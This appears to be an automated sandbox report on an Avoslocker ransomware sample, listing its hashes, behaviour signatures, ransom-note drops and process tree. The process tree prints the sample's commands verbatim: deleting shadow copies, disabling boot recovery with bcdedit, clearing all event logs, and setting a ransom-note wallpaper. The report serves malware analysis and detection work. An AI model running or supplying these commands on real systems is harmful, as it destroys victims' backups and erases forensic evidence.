Analysis
-
max time kernel
96s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-12-2024 14:43
Static task
static1
Behavioral task
behavioral1
Sample
DZ1N2_testing.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DZ1N2_testing.exe
Resource
win10v2004-20241007-en
General
-
Target
DZ1N2_testing.exe
-
Size
1.1MB
-
MD5
3864d4275dcd3d61c1952dd7609c95dc
-
SHA1
f675d9f4d3fea6064c1adc4b5f41b0c68af4d18a
-
SHA256
844ec4dfe83fe9cb72c93247cc45989a2f2522dbd5da34f27ef73eca04e96b45
-
SHA512
5dc8ca845c52d9315dcddbb890e5ee3fe387240afe5a64bfed9b7c635a910c34c13c2dc54916b8904591530b06a2fb43bfeec1f01913620e01f7adea0e4c1071
-
SSDEEP
24576:OImw98okVgela0as5CqLVO7XJCjkD3N0HRA:gL5ljasaU
Malware Config
Signatures
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Avoslocker family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5064 bcdedit.exe 36396 bcdedit.exe -
Renames multiple (8513) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation DZ1N2_testing.exe -
Executes dropped EXE 1 IoCs
pid Process 3656 P1kAlMiG2Kb7.scr -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI P1kAlMiG2Kb7.scr -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: P1kAlMiG2Kb7.scr -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\570914832.png" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngcc.md P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-100.HCWhite.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\fi\msipc.dll.mui P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\sunec.jar P1kAlMiG2Kb7.scr File created C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\es-ES\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailBadge.scale-400.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSmallTile.scale-150.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Java\jdk-1.8\jre\LICENSE P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\SmallLogoDev.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\s_agreement_filetype.svg P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected] P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File created C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldBe.snippets.ps1xml P1kAlMiG2Kb7.scr File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\es\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File created C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000011\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\hi.pak.DATA P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\en-US.pak P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\main-selector.css P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\profile.jfc P1kAlMiG2Kb7.scr File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\en-US\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Light.scale-125.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ppd.xrm-ms P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\7-Zip\History.txt P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-72_altform-unplated.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16\Stationery\BLANK.ONE P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntime2019R_PrepidBypass-ppd.xrm-ms P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.svg P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\ui-strings.js P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-16.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\glib.md P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\main-selector.css P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006\FA000000006 P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\sqloledb.rll P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_OEM_Perp-ul-oob.xrm-ms P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSplashLogo.scale-400.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-oob.xrm-ms P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeWideTile.scale-150.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ANTQUABI.TTF P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Java\jdk-1.8\jvisualvm.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_thumbnailview_18.svg P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\7-Zip\Lang\sv.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\public_suffix.md P1kAlMiG2Kb7.scr File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\win_x64\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-140.png P1kAlMiG2Kb7.scr File created C:\Program Files\VideoLAN\VLC\locale\te\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File created C:\Program Files\VideoLAN\VLC\locale\ru\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\SONORA.ELM P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ppd.xrm-ms P1kAlMiG2Kb7.scr File created C:\Program Files\Java\jre-1.8\lib\security\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons2x.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui P1kAlMiG2Kb7.scr -
pid Process 1616 powershell.exe 12448 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P1kAlMiG2Kb7.scr -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1720 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3656 P1kAlMiG2Kb7.scr 3656 P1kAlMiG2Kb7.scr 1616 powershell.exe 1616 powershell.exe 1616 powershell.exe 12448 powershell.exe 12448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 3656 P1kAlMiG2Kb7.scr Token: SeIncreaseQuotaPrivilege 10060 WMIC.exe Token: SeSecurityPrivilege 10060 WMIC.exe Token: SeTakeOwnershipPrivilege 10060 WMIC.exe Token: SeLoadDriverPrivilege 10060 WMIC.exe Token: SeSystemProfilePrivilege 10060 WMIC.exe Token: SeSystemtimePrivilege 10060 WMIC.exe Token: SeProfSingleProcessPrivilege 10060 WMIC.exe Token: SeIncBasePriorityPrivilege 10060 WMIC.exe Token: SeCreatePagefilePrivilege 10060 WMIC.exe Token: SeBackupPrivilege 10060 WMIC.exe Token: SeRestorePrivilege 10060 WMIC.exe Token: SeShutdownPrivilege 10060 WMIC.exe Token: SeDebugPrivilege 10060 WMIC.exe Token: SeSystemEnvironmentPrivilege 10060 WMIC.exe Token: SeRemoteShutdownPrivilege 10060 WMIC.exe Token: SeUndockPrivilege 10060 WMIC.exe Token: SeManageVolumePrivilege 10060 WMIC.exe Token: 33 10060 WMIC.exe Token: 34 10060 WMIC.exe Token: 35 10060 WMIC.exe Token: 36 10060 WMIC.exe Token: SeBackupPrivilege 2324 vssvc.exe Token: SeRestorePrivilege 2324 vssvc.exe Token: SeAuditPrivilege 2324 vssvc.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeIncreaseQuotaPrivilege 10060 WMIC.exe Token: SeSecurityPrivilege 10060 WMIC.exe Token: SeTakeOwnershipPrivilege 10060 WMIC.exe Token: SeLoadDriverPrivilege 10060 WMIC.exe Token: SeSystemProfilePrivilege 10060 WMIC.exe Token: SeSystemtimePrivilege 10060 WMIC.exe Token: SeProfSingleProcessPrivilege 10060 WMIC.exe Token: SeIncBasePriorityPrivilege 10060 WMIC.exe Token: SeCreatePagefilePrivilege 10060 WMIC.exe Token: SeBackupPrivilege 10060 WMIC.exe Token: SeRestorePrivilege 10060 WMIC.exe Token: SeShutdownPrivilege 10060 WMIC.exe Token: SeDebugPrivilege 10060 WMIC.exe Token: SeSystemEnvironmentPrivilege 10060 WMIC.exe Token: SeRemoteShutdownPrivilege 10060 WMIC.exe Token: SeUndockPrivilege 10060 WMIC.exe Token: SeManageVolumePrivilege 10060 WMIC.exe Token: 33 10060 WMIC.exe Token: 34 10060 WMIC.exe Token: 35 10060 WMIC.exe Token: 36 10060 WMIC.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeSecurityPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeSecurityPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeSecurityPrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 4144 wrote to memory of 3656 4144 DZ1N2_testing.exe 83 PID 4144 wrote to memory of 3656 4144 DZ1N2_testing.exe 83 PID 4144 wrote to memory of 3656 4144 DZ1N2_testing.exe 83 PID 3656 wrote to memory of 3536 3656 P1kAlMiG2Kb7.scr 85 PID 3656 wrote to memory of 3536 3656 P1kAlMiG2Kb7.scr 85 PID 3656 wrote to memory of 4980 3656 P1kAlMiG2Kb7.scr 86 PID 3656 wrote to memory of 4980 3656 P1kAlMiG2Kb7.scr 86 PID 3656 wrote to memory of 2136 3656 P1kAlMiG2Kb7.scr 87 PID 3656 wrote to memory of 2136 3656 P1kAlMiG2Kb7.scr 87 PID 3656 wrote to memory of 976 3656 P1kAlMiG2Kb7.scr 88 PID 3656 wrote to memory of 976 3656 P1kAlMiG2Kb7.scr 88 PID 3656 wrote to memory of 1208 3656 P1kAlMiG2Kb7.scr 89 PID 3656 wrote to memory of 1208 3656 P1kAlMiG2Kb7.scr 89 PID 1208 wrote to memory of 1616 1208 cmd.exe 90 PID 1208 wrote to memory of 1616 1208 cmd.exe 90 PID 4980 wrote to memory of 1720 4980 cmd.exe 91 PID 4980 wrote to memory of 1720 4980 cmd.exe 91 PID 2136 wrote to memory of 5064 2136 cmd.exe 92 PID 2136 wrote to memory of 5064 2136 cmd.exe 92 PID 976 wrote to memory of 36396 976 cmd.exe 94 PID 976 wrote to memory of 36396 976 cmd.exe 94 PID 3536 wrote to memory of 10060 3536 cmd.exe 96 PID 3536 wrote to memory of 10060 3536 cmd.exe 96 PID 3656 wrote to memory of 12448 3656 P1kAlMiG2Kb7.scr 100 PID 3656 wrote to memory of 12448 3656 P1kAlMiG2Kb7.scr 100 PID 12448 wrote to memory of 12692 12448 powershell.exe 103 PID 12448 wrote to memory of 12692 12448 powershell.exe 103 PID 12448 wrote to memory of 12360 12448 powershell.exe 104 PID 12448 wrote to memory of 12360 12448 powershell.exe 104 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\DZ1N2_testing.exe"C:\Users\Admin\AppData\Local\Temp\DZ1N2_testing.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr"C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr" /S2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\SYSTEM32\cmd.execmd /c wmic shadowcopy delete /nointeractive3⤵
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:10060
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet3⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:1720
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c bcdedit /set {default} recoveryenabled No3⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:5064
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:36396
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:12448 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\570914832.png /f4⤵
- Sets desktop wallpaper using registry
PID:12692
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False4⤵PID:12360
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2324
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1011B
MD5c92c2b70fb37f84aab38412ad9226aa8
SHA114f2e9a83285612d0a7b2c83b8f89bccfde6c154
SHA256d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f
SHA51204f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5cdf5ec4de17b132e39d2c637289ee211
SHA1918d7f04a99fd2f948e5989c895c12bb8563e694
SHA256c6d0e6054ed0f49430883aa84b2af5352e2c0527d3a32283ea26c5c766223f20
SHA512fd1d825794e91244336964905bf4dadcbbcf09b940eeddc5cc5ca19377025cba37154e2d7cbcec0af5a6a43974f821ea85a8209fbf1584b01b8f9df3f1eac48a
-
Filesize
807KB
MD5e27b5291c8fb2dfdeb7f16bb6851df5e
SHA140207f83b601cd60905c1f807ac0889c80dfe33f
SHA256ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f
SHA5122ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82